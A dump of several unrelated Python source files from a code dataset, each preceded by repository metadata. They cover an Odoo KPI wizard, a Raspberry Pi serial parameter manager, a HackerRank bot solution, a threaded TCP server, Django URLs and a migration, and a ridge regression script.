self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'1', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'II':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'2', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'III':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'3', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'IV':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'4', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'V':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'5', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
elif level == 'VI':
self.pool.get('hp.kpis.view.chart.setting.productivity').create(cr, uid, {'name': month.name, 'type':'6', 'point': _setting_report.point, 'quantity': 1 * _setting_report.complete})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_setting_productivity_graph')
else:
_setting_ids = self.pool.get('hp.kpis.view.chart.setting.compare').search(cr, uid, [])
if(_setting_ids):
self.pool.get('hp.kpis.view.chart.setting.compare').unlink(cr, uid, _setting_ids)
if(obj.option == 'month'):
date_to = datetime.strptime(obj.month.date_start, '%Y-%m-%d')
for i in range(1, 5):
#tinh ngay cua tung tuan
if i == 1:
date_from = date_to
date_to = date_from + relativedelta(days=6)
else:
date_from = date_to + relativedelta(days=1)
if i == 4:
date_to = obj.month.date_stop
elif i !=1 :
date_to = date_from + relativedelta(days=7)
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',date_from),('parent_id.report_date','<=',date_to),('parent_id.state','=','confirmed')])
for _setting_report_id in _setting_report_ids:
setting = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
self.pool.get('hp.kpis.view.chart.setting.compare').create(cr, uid, {'name': 'Week '+str(i),'point': setting.point, 'quantity': 1 * setting.complete,'employee_id': setting.worker.id})
else:
#get month list
month_ids = self.pool.get('account.period').search(cr, uid, [('date_start','>=',obj.month_from.date_start),('date_stop','<=',obj.month_to.date_stop)])
for i in month_ids:
# month
month = self.pool.get('account.period').browse(cr, uid, i, context)
if month.date_start != month.date_stop:
#get report 3d line
_setting_report_ids = self.pool.get('hpusa.setting.report.line').search(cr, uid, [('parent_id.report_date','>=',month.date_start),('parent_id.report_date','<=',month.date_stop),('parent_id.state','=','confirmed')])
for _setting_report_id in _setting_report_ids:
setting = self.pool.get('hpusa.setting.report.line').browse(cr, uid, _setting_report_id)
self.pool.get('hp.kpis.view.chart.setting.compare').create(cr, uid, {'name': month.name,'point': setting.point, 'quantity': 1 * setting.complete, 'employee_id': setting.worker.id})
res = mod_obj.get_object_reference(cr, uid, 'hpusa_kpis_manufacturing', 'action_hp_kpis_view_chart_setting_compare_graph')
id = res and res[1] or False
result = act_obj.read(cr, uid, [id], context=context)[0]
result['target'] = 'current'
return result
wizard_hp_report_chart_kpis_setting()
| UTF-8 | Python | false | false | 54,504 | py | 89 | wizard_hp_report_kpis_chart.py | 47 | 0.522567 | 0.514366 | 0 | 701 | 76.74465 | 263 |
alexmlucas/i1 | 12,824,772,355,851 | f080f88cd75f5556828288bbad3e329c4116e3da | 66e7978eb51f74ddd9b5f8d9ecbf35617b982da3 | /rpi_script/parameter_manager.py | 8c41a765184115a80fd59cd976740882cbe0539a | []
| no_license | https://github.com/alexmlucas/i1 | aa0ef1b98d5f2449bc69a14f7822beca9c3628f4 | 154fcc72b2ab87c1bf3f1f5ba2baf20b025223f2 | refs/heads/master | 2021-10-10T10:31:20.236306 | 2019-09-12T13:54:17 | 2019-09-12T13:54:17 | 158,238,900 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import serial
import csv
from subprocess import call
class Parameter_Manager:
def __init__(self, port, baud_rate):
self.port = port
self.baud_rate = baud_rate
self.song_data_path = "/home/pi/i1/rpi_script/song_data.txt"
self.global_data_path = "/home/pi/i1/rpi_script/global_data.txt"
# Initalise class variables from saved parameter values
self.current_song = self.get_global_parameter('b')
self.master_level = self.float_value_generator(self.get_global_parameter('a'))
self.backing_level = self.float_value_generator(self.get_song_parameter('e'))
self.guitar_level = self.midi_value_generator(self.get_song_parameter('d'))
# Intialise serial port
self.control_board = serial.Serial(self.port, self.baud_rate, timeout = 0.1)
# Flush inputs and outputs
self.control_board.flushInput()
self.control_board.flushOutput()
# Flag for indicating that bluetooth reconnection has been requested.
# Initialise with a value of True to ensure wristband connection is attempted on program start.
self.reconnect_wristband_flag = True
def midi_value_generator(self, value_to_convert):
# convert values between 0 - 10 to vaues between 0 - 127
return (value_to_convert / 10) * 127
def float_value_generator(self, value_to_convert):
return value_to_convert / 10
def set_song_player(self, song_player):
# Create a local reference to the song player.
self.song_player = song_player
# Now that a reference to the song player is available, set the song...
self.song_player.set_song(self.get_global_parameter('b'))
# ...and set its level
self.song_player.set_level(self.backing_level * self.master_level)
def set_guitar(self, guitar):
# Create a local reference to the guitar.
self.guitar = guitar
# Now that a reference to the guitar is available, set its path...
self.guitar.set_sound_font(self.get_song_parameter('c'))
# ... and its level
self.guitar.set_level(int(self.guitar_level * self.master_level))
#### Set scales ####
# Red scale
self.guitar.set_zone_notes(0, self.get_song_parameter('f'))
# Green scale
self.guitar.set_zone_notes(1, self.get_song_parameter('g'))
# Blue scale
self.guitar.set_zone_notes(2, self.get_song_parameter('h'))
#### Set transpositions ####
# Red transposition
self.guitar.set_transposition(0, self.get_song_parameter('i'))
# Green transposition
self.guitar.set_transposition(1, self.get_song_parameter('j'))
# Blue transposition
self.guitar.set_transposition(2, self.get_song_parameter('k'))
def check_incoming(self):
# Read data from the serial port
incoming_serial = self.control_board.readline().rstrip().decode()
# Flush the serial port
self.control_board.flushInput()
if incoming_serial:
print(incoming_serial)
if incoming_serial[0] is 'a':
# Master level (Global Parameter)
# Convert incoming string to a float value
value_as_float = self.float_value_generator(self.get_number_from_string(incoming_serial))
# Set the master level
self.master_level = value_as_float
# Change the level of the song player
self.song_player.set_level(self.backing_level * self.master_level)
# Change the level of the guitar
self.guitar.set_level(int(self.guitar_level * self.master_level))
# Write the parameter
self.write_global_parameter(incoming_serial)
elif incoming_serial[0] is 'b':
# Song (Global Parameter)
# Write the parameter
self.write_global_parameter(incoming_serial)
# Update the current song
self.current_song = int(incoming_serial[2])
# Update local variables
self.backing_level = self.float_value_generator(self.get_song_parameter('e'))
self.guitar_level = self.midi_value_generator(self.get_song_parameter('d'))
# Act on changes to parameter values
self.song_player.set_song(self.current_song)
self.song_player.set_level(self.backing_level * self.master_level)
self.guitar.set_level(int(self.guitar_level * self.master_level))
self.guitar.set_sound_font(self.get_song_parameter('c'))
self.guitar.set_zone_notes(0, self.get_song_parameter('f'))
self.guitar.set_zone_notes(1, self.get_song_parameter('g'))
self.guitar.set_zone_notes(2, self.get_song_parameter('h'))
self.guitar.set_transposition(0, self.get_song_parameter('i'))
self.guitar.set_transposition(1, self.get_song_parameter('j'))
self.guitar.set_transposition(2, self.get_song_parameter('k'))
# Transmit the song data
self.song_data_requested()
elif incoming_serial[0] is 'c':
# Guitar
# Set the sound font by removing the first two characters from the incoming serial string and converting to int
self.guitar.set_sound_font(int(incoming_serial[1:]))
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'd':
# Guitar Level
# convert incoming string to midi value
midi_value = self.midi_value_generator(self.get_number_from_string(incoming_serial))
# Set the backing level local value
self.guitar_level = midi_value
# actually change the volume
self.guitar.set_level(int(self.guitar_level * self.master_level))
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'e':
# Backing Level
# convert incoming string to float value
value_as_float = self.float_value_generator(self.get_number_from_string(incoming_serial))
# Set the backing level local value
self.backing_level = value_as_float
# actually change the volume
self.song_player.set_level(self.backing_level * self.master_level)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'f':
# Red Scale
# Get the scale value
scale_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_zone_notes(0, scale_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'g':
# Green Scale
# Get the scale value
scale_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_zone_notes(1, scale_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'h':
# Blue Scale
# Get the scale value
scale_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_zone_notes(2, scale_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'i':
# Red Root
# Get the value
transposition_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_transposition(0, transposition_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'j':
# Green Root
# Get the value
transposition_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_transposition(1, transposition_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'k':
# Blue Root
# Get the value
transposition_value = int(incoming_serial[2]) + (int(incoming_serial[1]) * 10)
# Set the scale
self.guitar.set_transposition(2, transposition_value)
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'l':
# Zone
# Write the parameter
self.write_song_parameter(incoming_serial)
elif incoming_serial[0] is 'm':
# Reconnect Request
self.reconnect_wristband_flag = True
elif incoming_serial[0] is 'n':
# Power
# Local action
self.shutdown_device(incoming_serial)
elif incoming_serial[0] is 'o':
# Play
self.song_player.set_play_state(int(incoming_serial[2]))
elif incoming_serial[0] is 'r':
# Initial data request.
# Send the global parameters
self.global_data_requested()
# Send the song data
self.song_data_requested()
def shutdown_device(self, incoming_serial):
print('Shutting down')
#call("sudo shutdown -h now", shell=True)
def write_song_parameter(self, incoming_serial):
# Indicates whether or not a parameter has been found in the list.
write_flag = False
# Creates a list containing 5 lists, each of 8 items, all set to 0
w, h = 4, 9;
song_data_as_list = [[0 for x in range(w)] for y in range(h)]
'''print("before data added")
with open('song_data.txt') as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
print(row[current_song])'''
with open(self.song_data_path) as csv_file:
song_data_reader = csv.reader(csv_file, delimiter = ',')
# Convert the song data to a list so that we can easily work with it.
song_data_as_list = list(song_data_reader)
# Initialise an index variable for use with the following for loop
index = 0
# Interate through the song data list
for index, row in enumerate(song_data_as_list):
# Isolate the parameter associated with the currently selected song
cell_string = row[self.current_song]
# If the first character matches that of the incoming serial...
if(incoming_serial[0] == cell_string[0]):
#... indicate that we need to overwrite the parameter in this position.
write_flag = True
break
# If the write flag is true...
if write_flag == True:
#... overwrite the parameter in the array.
song_data_as_list[index][self.current_song] = incoming_serial
# and write the data to the song data text file.
with open(self.song_data_path, mode='w') as csv_file:
song_data_writer = csv.writer(csv_file, delimiter = ',')
song_data_writer.writerows(song_data_as_list)
'''print("after data added")
with open('song_data.txt') as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
print(row[current_song])'''
def write_global_parameter(self, incoming_serial):
# Indicates whether or not a parameter has been found in the list.
write_flag = False
# Create a 2 x 1 array, initialised to 0
w, h = 2, 1;
global_data_as_list = [[0 for x in range(w)] for y in range(h)]
'''print("before data added")
with open('global_data.txt') as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
print(global_data_as_list)'''
with open(self.global_data_path) as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
# Convert the global data to a list so that we can easily work with it.
global_data_as_list = list(global_data_reader)
# initialise index's for iterating through the following for loop.
row_index = 0
cell_index = 0
for row_index, row in enumerate(global_data_as_list):
for cell_index, cell_string in enumerate(row):
# If the first character matches that of the incoming serial...
if(incoming_serial[0] == cell_string[0]):
#... indicate that we need to overwrite the parameter in this position.
write_flag = True
break
# Exit the parent for loop
if(write_flag == True):
break
# If the write flag is true...
if write_flag == True:
#... overwrite the parameter in the array.
global_data_as_list[row_index][cell_index] = incoming_serial
# and write the data to the song data text file.
with open(self.global_data_path, mode='w') as csv_file:
global_data_writer = csv.writer(csv_file, delimiter = ',')
global_data_writer.writerows(global_data_as_list)
'''print("after data added")
with open('global_data.txt') as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
print(global_data_as_list)'''
def global_data_requested(self):
with open(self.global_data_path) as csv_file:
global_data = csv.reader(csv_file, delimiter = ',')
# Nasty hack to get global data sent.
# Will need to be changed if more data is added to the text file
for row in global_data:
byte_array = bytes(row[0], 'utf-8')
self.control_board.write(byte_array)
byte_array = bytes(row[1], 'utf-8')
self.control_board.write(byte_array)
def song_data_requested(self):
with open(self.song_data_path) as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
byte_array = bytes(row[self.current_song], 'utf-8')
byte_array1 = row[self.current_song]
print(byte_array1)
self.control_board.write(byte_array1.encode())
'''def get_last_selected_song(self):
# create a 2 x 1 array
w, h = 2, 1;
global_data_as_list = [[0 for x in range(w)] for y in range(h)]
with open('global_data.txt') as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
row_index = 0
cell_index = 0
for row_index, row in enumerate(global_data_as_list):
for cell_index, cell_string in enumerate(row):
if(cell_string[0] == 'b'):
# song parameter found
return int(cell_string[2])'''
def get_global_parameter(self, parameter_character):
# create a 2 x 1 array
w, h = 2, 1;
global_data_as_list = [[0 for x in range(w)] for y in range(h)]
with open(self.global_data_path) as csv_file:
global_data_reader = csv.reader(csv_file, delimiter = ',')
global_data_as_list = list(global_data_reader)
row_index = 0
cell_index = 0
for row_index, row in enumerate(global_data_as_list):
for cell_index, cell_string in enumerate(row):
# If the first character matches...
if(parameter_character == cell_string[0]):
#... return the value
return int(cell_string[2]) + (int(cell_string[1]) * 10)
def get_song_parameter(self, parameter_character):
# Indicates whether or not a parameter has been found in the list.
write_flag = False
# Creates a list containing 5 lists, each of 8 items, all set to 0
w, h = 4, 9;
song_data_as_list = [[0 for x in range(w)] for y in range(h)]
'''print("before data added")
with open('song_data.txt') as csv_file:
song_data = csv.reader(csv_file, delimiter = ',')
for row in song_data:
print(row[current_song])'''
with open(self.song_data_path) as csv_file:
song_data_reader = csv.reader(csv_file, delimiter = ',')
# Convert the song data to a list so that we can easily work with it.
song_data_as_list = list(song_data_reader)
# Initialise an index variable for use with the following for loop
index = 0
# Interate through the song data list
for index, row in enumerate(song_data_as_list):
# Isolate the parameter associated with the currently selected song
cell_string = row[self.current_song]
# If the first character matches...
if(parameter_character == cell_string[0]):
#... return the value
return int(cell_string[2]) + (int(cell_string[1]) * 10)
def get_number_from_string(self, string_value):
return int(string_value[2]) + (int(string_value[1]) * 10)
def tx_wristband_connection_attempt(self):
character_to_transmit = 'p00'
self.control_board.write(character_to_transmit.encode())
def tx_wristband_success(self):
character_to_transmit = 'q00'
self.control_board.write(character_to_transmit.encode())
def tx_wristband_failure(self):
character_to_transmit = 'r00'
self.control_board.write(character_to_transmit.encode())
| UTF-8 | Python | false | false | 15,850 | py | 49 | parameter_manager.py | 37 | 0.67123 | 0.66183 | 0 | 463 | 33.226782 | 115 |
kyrs/hackerank-solution | 12,206,297,088,703 | f3a005badda087592dccd0c572e82ac986771aa2 | 4265c94c924f0086a8541d7d768db1b73a9982ed | /Artificial Intelligence/save_princess_2/princess2.py | c5938aa2073bd2e208d9086dcecf2d4e5375296d | []
| no_license | https://github.com/kyrs/hackerank-solution | f27972af9d234a48102f187fc23d7d4bd06f15bb | 8c3ba62802dcc8a487b91f19961839af14a26984 | refs/heads/master | 2021-01-10T08:04:39.980852 | 2016-01-17T14:30:55 | 2016-01-17T14:30:55 | 49,046,311 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | ''' Coded by Kumar Shubham
Date : 6-Jan-2016'''
#!/bin/python
class SavePrincess(object):
def __init__(self,m, grid):
self.SizeMatrix = m
self.GridMatrix = grid
self.PrincessCordinate = None
self.BotCordinate = None
self.PrincessMarker = "p"
self.BotMarker = "m"
def ValidRow(self):
return self.SizeMatrix == len(self.GridMatrix)
def ValidCol(self):
CorrectFlag =True
for row in self.GridMatrix:
if not len(row) == self.SizeMatrix:
Exception("Wrong column !!")
CorrectFlag = False
break
return CorrectFlag
def ValidMatrix(self):
RowValid = self.ValidRow()
ColumnValid = self.ValidCol()
return (RowValid and ColumnValid)
def FindCoordinate(self, marker) :
CoordPoint =[]
for i,row in enumerate(self.GridMatrix):
for j,col in enumerate(row):
if col == marker :
CoordPoint = [i,j]
if len(CoordPoint) == 0 :
Exception("%s Marker not Found "%(marker))
return CoordPoint
def PrincessCoordinate(self):
return self.FindCoordinate(self.PrincessMarker)
def BotCoordinate(self):
return self.FindCoordinate(self.BotMarker)
def nextMove(n,r,c,grid):
Grid = SavePrincess(n,grid)
Grid.BotCoordinate = [r,c]
BotPosition = [r,c]
if not Grid.ValidMatrix() :
Exception ("Matrix is invalid !!!")
else:
PrincessPosition = Grid.PrincessCoordinate()
PrincessPosition[0] = BotPosition[0]-PrincessPosition[0]
PrincessPosition[1] = BotPosition[1]-PrincessPosition[1]
#BotPosition = [0,0]
BotX = 0
BotY = 0
PrincessY = PrincessPosition[0]
PrincessX = PrincessPosition[1]
#Xdepth = BotX-PrincessX
#Ydepth = BotY-PrincessY
PathDistance = [abs(PrincessX),abs(PrincessY)]
PathChoose = min(PathDistance)
IndexMinPath = PathDistance.index(PathChoose)
if (PathChoose == 0):
IndexMinPath = not IndexMinPath
if IndexMinPath == False :
if (PrincessX>0):
Turn = "LEFT"
else :
Turn = "RIGHT"
if IndexMinPath== True :
if (PrincessY>0):
Turn = "UP"
else:
Turn = "DOWN"
return Turn
n = input()
r,c = [int(i) for i in raw_input().strip().split()]
grid = []
for i in xrange(0, n):
grid.append(raw_input())
print nextMove(n,r,c,grid) | UTF-8 | Python | false | false | 2,676 | py | 9 | princess2.py | 8 | 0.548954 | 0.540732 | 0 | 122 | 20.942623 | 64 |
iamsaptorshe07/TRAVMAKS-Old | 15,547,781,648,692 | 7ccaafb941555a508caa36e70a4cf3a85ff36cf4 | 6596113cfc5a4d19a1edbb1bc93cb0d43af67a6d | /travelagency/urls.py | 74ad76a2e5f25837ff7cd7ab06ac51b454d2a68d | []
| no_license | https://github.com/iamsaptorshe07/TRAVMAKS-Old | 3fe7cbb603264ab3513439a42eec8843af859daa | e0159ae8e7cd1c77e6475df77cc9dc769c7d4bd2 | refs/heads/main | 2023-07-01T21:08:36.931079 | 2021-07-31T08:26:11 | 2021-07-31T08:26:11 | 333,350,933 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.urls import path
from .views import *
from .tests import *
urlpatterns = [
path('myagency/<agid>',travelagency_home,name='travelAgencyHome'),
path('myagency/addtour/<int:uid>/<str:agid>',addTour,name='addTour'),
path('agencytours/<int:uid>/<str:agid>',agencyTours,name='agencyTour'),
path('agencytours/edit-tour/<str:agentId>/<str:tourId>',editTours,name='editTours'),
path('agencytours/delete-tour/<agentId>/<tourId>',deleteteTour,name='deleteteTour'),
path('booking-history/<agentId>',booking_history,name='bookingHistory'),
path('upcoming-tours/<agentId>',upcoming_tours,name='upcomingTours'),
path('ongoing-tours/<agentId>',ongoing_tours,name='ongoingTours'),
path('notifications',bookingNotification,name='bookingNotification'),
path('accept-package-booking-order/<orderId>',acceptOrder,name='acceptOrder'),
path('decline-package-booking-order/<orderId>',declineOrder,name='declineOrder'),
path('travmaks-partner/<agencyID>',agencyTourShare,name='AgencyPage'),
path('test-url',testpage,name='testURL'),
] | UTF-8 | Python | false | false | 1,073 | py | 123 | urls.py | 60 | 0.730662 | 0.730662 | 0 | 18 | 58.666667 | 88 |
anhnda/gformstats | 13,056,700,599,124 | 82902775297df8b311c39ac01468ff48e2a0d9f9 | 622eea38f1fb1c4bedddf26c1c5904c078339eef | /data/final_responses/IT4866_20132546/20132546_RR.py | e04cdcc1d11de7650748039ac8d4c556d13ce4db | []
| no_license | https://github.com/anhnda/gformstats | 4aec7ee2d325caabbf65cd5b72fdb4eab9d13c25 | 5e1ae2a600464f50185b887c7efa906e85b4cad6 | refs/heads/master | 2019-03-20T05:29:10.599530 | 2018-03-05T07:28:22 | 2018-03-05T07:28:22 | 105,976,418 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from sklearn.preprocessing import scale
from sklearn import metrics
import numpy
import csv
# Trích ma trận X và vector y từ file dữ liệu đã cho
Xy = numpy.loadtxt("/home/mable/Desktop/python/training-data.csv", dtype=float ,delimiter=",", skiprows=1)
Xy1 = numpy.loadtxt("/home/mable/Desktop/python/20132546-test.csv", dtype=float ,delimiter=",")
X = Xy[:, 0:-1]
X = scale(X)
y = Xy[:, -1]
y -= y.mean()
X_train = X
y_train = y
X_test = Xy1[:, 0:-1]
X_test = scale(X_test)
# Tính w với alpha = 0.5 với Ridge
from sklearn.linear_model import Ridge
rreg = Ridge(alpha=0.5, normalize=True)
rreg.fit(X_train, y_train)
rreg.coef_
preds = rreg.predict(X_test)
# print 'RMSE (Ridge reg.) =', np.sqrt(metrics.mean_squared_error(y_test, preds))
# sử dụng RidgeCV để tìm alpha tốt nhất
from sklearn.linear_model import RidgeCV
alpha_range = 10.**np.arange(-2, 3)
rregcv = RidgeCV(normalize=True, scoring='mean_squared_error', alphas=alpha_range)
rregcv.fit(X_train, y_train)
rregcv.alpha_
preds = rregcv.predict(X_test)
# print 'RMSE (Ridge CV reg.) =', np.sqrt(metrics.mean_squared_error(y_test, preds))
# Giá trị y_test
print preds
# in ra giá trị alpha tốt nhất
print rregcv.alpha_
# GHi giá trị y_test vào file csv
r = csv.reader(open('/home/mable/Desktop/python/20132546-test.csv')) # Here your csv file
lines = [l for l in r]
for i in range(0,10):
lines[i][8] = preds[i]
writer = csv.writer(open('/home/mable/Desktop/python/20132546test.csv', 'w'))
writer.writerows(lines)
| UTF-8 | Python | false | false | 1,540 | py | 503 | 20132546_RR.py | 109 | 0.700067 | 0.670675 | 0 | 49 | 29.55102 | 106 |
marcelopederiva/CodeSignal | 12,481,174,963,129 | 8cb856cc2e73a3cd1d64a5bac63968fe5be30103 | 6372a2de8c0d904504cc004b5bddddf47e6ae44b | /Arcade_Intro/checkPalindrome.py | 04632dedbd0d641450c08652e6e371373017e58f | []
| no_license | https://github.com/marcelopederiva/CodeSignal | 8d9fee5908403316b72adfa44c01daefd80501e9 | b5006caa47cbe4dbaf05f175abd7cb75ba81ee83 | refs/heads/master | 2021-05-21T19:00:23.046352 | 2020-04-03T14:58:27 | 2020-04-03T14:58:27 | 252,754,653 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def checkPalindrome(inputString):
if list(inputString) == list(inputString)[::-1]:
return True
else:
return False
| UTF-8 | Python | false | false | 149 | py | 57 | checkPalindrome.py | 57 | 0.583893 | 0.577181 | 0 | 5 | 26.6 | 52 |
zzlyzq/speeding | 9,002,251,489,632 | 52a68bb591bfd7fdfcf6ab8057a3d2d04e68b8f4 | c5c71eb1011f53a6e878b91ca02eebdba5e06c37 | /funcs/mgmt.py | e50a5c87fc11b064517954c5c6022b20805fd07a | []
| no_license | https://github.com/zzlyzq/speeding | 4458dc4443ed5f548952a874f9aa8d1dd75f19c6 | fc8f61660910c9cba8979b368f146efb76d5810b | refs/heads/master | 2021-01-19T13:49:52.179935 | 2017-04-13T01:43:09 | 2017-04-13T01:43:09 | 88,112,397 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*
from fabric.api import *
from fabric.context_managers import *
from fabric.contrib.console import confirm
from fabric.contrib.files import *
from fabric.contrib.project import rsync_project
import fabric.operations
import time,os
import logging
import base64
from getpass import getpass
import json
import sys
# 定义一些常量
## 本地软件目录
env.local_softdir="/opt/software/"
## 远端软件目录
env.remote_softdir="/opt/software/"
## 远端家目录
env.remote_dir="/opt/machtalk/"
############# MGMT START 管理机器部署
@task
@roles('mgmt')
def files_upload():
#filenames=[ 'addons.tar.gz', 'erlang.tar.gz', 'haproxy.tar.gz', 'mariadb-10.1.16-linux-x86_64.tar.gz', 'mq.tar.gz', 'openfalcon.tar.gz', 'rd.tar.gz', 'solrcloud.tar.gz', 'cloudera-manager-el6-cm5.5.0_x86_64.tar.gz', 'fastdfs.tar.gz', 'kafka_2.12-0.10.2.0.tar.gz', 'mongodb-linux-x86_64-2.6.11.tar.gz', 'nginx.tar.gz', 'rabbitmq_server-3.6.5.tar.gz', 'redis-2.8.23.tar.gz', 'zookeeper-3.4.7.tar.gz', 'CDH-5.5.0-1.cdh5.5.0.p0.8-el6.parcel', 'CDH-5.5.0-1.cdh5.5.0.p0.8-el6.parcel.sha', 'others' ]
filenames=[ 'addons.tar.gz' ]
for filename in filenames:
# TODO 如果dst dir 不存在,那么就自动创建
put(env.local_softdir+filename,env.remote_softdir) | UTF-8 | Python | false | false | 1,297 | py | 21 | mgmt.py | 20 | 0.702391 | 0.64798 | 0 | 33 | 35.787879 | 496 |
mattf4171/ComputerNetworks | 17,506,286,700,518 | 1ce68967663adcbf5a8a7bcb9e5e8e42e54d7918 | 684407cc2a451ae36aa996bdc35eb52d27339b73 | /TCP_threadedServer/serverTCP.py | 3d42ae53fc61e145ed94105db4add2ee612c92f9 | []
| no_license | https://github.com/mattf4171/ComputerNetworks | bc1162979b84c7521f67b5a14b507301ad71dcc1 | 06adc719f38867120682feca4268277d680c4f7c | refs/heads/main | 2023-04-09T18:39:50.840666 | 2021-04-05T00:04:01 | 2021-04-05T00:04:01 | 354,667,527 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 4 16:27:09 2021
@author: matthewfernandez
"""
from socket import *
import threading
i = 0
sentences = [] # will append the messages in the empty array then dispay them in the order they were received
def catch_msg(socket, name):
global i, sentences
sentences.append(socket.recv(1024).decode())
msg = name + " Sent message: " + sentences[i] # format for each client program running
print(msg)
i += 1
serverPort = 12000
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.bind(("",serverPort))
serverSocket.listen(2) # listen for 2 client connections
print("The server is ready to receive")
while True:
connectionSocketX,addrX = serverSocket.accept() # First connection
print("Accepted first connection, calling it connection X")
connectionSocketX.send("Client X connected".encode())
connectionSocketY,addrY = serverSocket.accept() # Second connection
print("Accepted second connection, calling it connection Y")
connectionSocketY.send("Client Y connected".encode())
print("\nWaiting to receive messages from client X and client Y\n")
t1 = threading.Thread(target=catch_msg,args = (connectionSocketX,"Client X"))
t2 = threading.Thread(target=catch_msg,args = (connectionSocketY,"Client Y"))
t1.start()
t2.start()
t2.join()
t1.join()
msg = sentences[0] + " received before " + sentences[1]
connectionSocketX.send(msg.encode())
connectionSocketY.send(msg.encode())
connectionSocketX.close() # free up the ports since we no longer need them
connectionSocketY.close()
| UTF-8 | Python | false | false | 1,608 | py | 2 | serverTCP.py | 2 | 0.732368 | 0.710957 | 0 | 54 | 28.407407 | 109 |
Starenesha/django-prj-test | 7,267,084,687,475 | b051db1e23c63cd872bcc9487204cd93249d6119 | 1ad01cf671ec81155e470030999b5fdd13919d58 | /meter/migrations/0002_csvupload_meter.py | d3514d24289cfb11152288e62438f58c752a988c | []
| no_license | https://github.com/Starenesha/django-prj-test | affa250087b6ffb2783c654b32ab54ac3686799b | c5ceaca4fb997eb541b8dded36c72c8e98e50730 | refs/heads/master | 2023-04-27T10:49:43.645172 | 2021-08-08T16:16:44 | 2021-08-08T16:16:44 | 199,383,673 | 0 | 0 | null | false | 2023-04-21T20:34:53 | 2019-07-29T05:23:35 | 2021-08-08T16:16:47 | 2023-04-21T20:34:51 | 37 | 0 | 0 | 5 | Python | false | false | # Generated by Django 2.2.3 on 2019-08-06 02:37
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('meter', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='csvupload',
name='meter',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='meter.Meter'),
),
]
| UTF-8 | Python | false | false | 467 | py | 13 | 0002_csvupload_meter.py | 7 | 0.620985 | 0.5803 | 0 | 19 | 23.578947 | 111 |
krishna0512/drf | 6,236,292,515,787 | 37eedf304e2e412c25aeb2aab1d9b2fff6828b0c | 5fbc48cb9d5ff7688be323434e8879563c97256e | /mysite/polls/migrations/0008_auto_20150926_1129.py | 123b7be296f8fa84471c13a480514885acf20841 | []
| no_license | https://github.com/krishna0512/drf | c92defb47420f2ef124fa6964e7e78e327fdd2dd | 2516e069d88466c5fce2252d5c4eedc3d07920a1 | refs/heads/master | 2021-01-10T19:54:16.282489 | 2015-10-01T11:15:23 | 2015-10-01T11:15:23 | 37,807,772 | 0 | 2 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0007_student'),
]
operations = [
migrations.AddField(
model_name='question',
name='correct',
field=models.CharField(default='', max_length=20000, verbose_name=b'list of users given correct answers.'),
preserve_default=False,
),
migrations.AddField(
model_name='question',
name='incorrect',
field=models.CharField(default='', max_length=20000, verbose_name=b'list of users given incorrect ans...'),
preserve_default=False,
),
]
